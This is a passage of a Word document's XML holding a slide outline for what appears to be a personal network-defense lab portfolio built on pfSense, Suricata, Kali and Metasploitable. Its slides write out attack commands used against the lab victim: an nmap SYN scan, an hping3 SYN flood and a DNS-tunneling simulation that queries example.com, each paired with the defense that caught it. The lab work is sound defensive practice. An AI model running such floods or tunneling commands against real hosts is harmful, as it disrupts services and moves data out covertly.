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BBAAB" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slide 1 – Project Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9526DD" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Title:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Network Ninja’s Firewall Defense Hack Bootcamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17009FC4" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bullet Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFDCD84" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve">, Suricata, Kali Linux, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5CC1F3FA" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Skills Demonstrated:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Firewall rules, IDS/IPS signature writing, VLAN isolation, packet analysis, reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B9B269" w14:textId="6B7BC317" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Demonstrates practical, hands-on network defense skills</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE31E6" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visual Placeholder:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> network_topology.png – diagram showing Kali → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37CD1088" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Defenses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5100124A" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Layered defense using firewall + IDS/IPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACA7568" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve">VLAN segmentation to isolate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> from sensitive network segments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1406C610" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Call to Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> “View full lab configuration and evidence in the GitHub portfolio.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E91EE4" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:pict w14:anchorId="701CC654">
          <v:rect id="_x0000_i1166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452EAD2" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slide 2 – Lab Architecture &amp; Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C073389" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Title:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Lab Architecture &amp; Network Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B50DFEA" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Machines &amp; IPs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AB0958" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Kali Linux: 192.168.1.100 (Attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492600A" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>: 192.168.1.102 (Victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7B4F20" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>: Gateway/Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B976341" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VLANs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C78C48" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>VLAN1: Attacker network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D6D90" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>VLAN2: Protected segments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16410B20" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Proper network segmentation prevents lateral movement and isolates attacks effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58548DFC" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visual Placeholder:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Detailed network topology diagram with VLANs highlighted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED7E1B3" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Defenses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA721B" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:lastRenderedPageBreak/>
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> firewall controls inbound/outbound traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F86D17" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>VLANs enforce segmentation to limit attack reach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E1226" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Call to Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> “Explore VLAN configuration and firewall rules in the repository.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748B3350" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:pict w14:anchorId="1AF16FE4">
          <v:rect id="_x0000_i1167" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3C797A" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slide 3 – Step 2 &amp; 3: Port Scan &amp; SYN Flood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D0912" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Title:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Port Scan &amp; SYN Flood Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121E9E1" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 – Port Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D163DC5" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> 192.168.1.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094C9107" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> firewall rule blocks SYN scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596460BB" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Screenshot </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve">/firewall_rules.pdf, PCAP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>port_scan.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7ADFBFB2" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 – SYN Flood / DDoS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA00BA" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> hping3 -S --flood -V -p 80 192.168.1.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048AE386" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Suricata threshold-based SYN flood rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F473A35" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Suricata alert terminal screenshot, PCAP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>syn_flood.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A90FBBD" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visual Placeholder:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Terminal screenshot showing live Suricata alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37165E7F" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Threshold-based alerts detect volumetric attacks in real time, preventing service outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703409FF" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Defenses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17707001" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Firewall rules prevent unauthorized scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F858D49" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>IDS/IPS thresholds detect and mitigate SYN flood attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A08D4" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Call to Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> “Check the live Suricata alert logs in the GitHub repository.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378188A7" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:pict w14:anchorId="3B5E3C8B">
          <v:rect id="_x0000_i1168" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F644E20" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slide 4 – Step 4: DNS Tunneling &amp; VLAN Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46160B33" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Title:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> DNS Tunneling Detection + VLAN Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B87AD1" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C9537" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:t>dig $(head -c 60 /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>urandom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> | base64 | tr -d '=+/'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>).example.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5B055165" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Defense:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Suricata DNS rules detect suspicious queries; VLAN isolation blocks lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7610779D" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C9BFC3" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Suricata fast.log showing DNS alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE9441" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve">PCAP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>dns_tunnel.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E1A3131" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve">VLAN screenshots from </w:t>
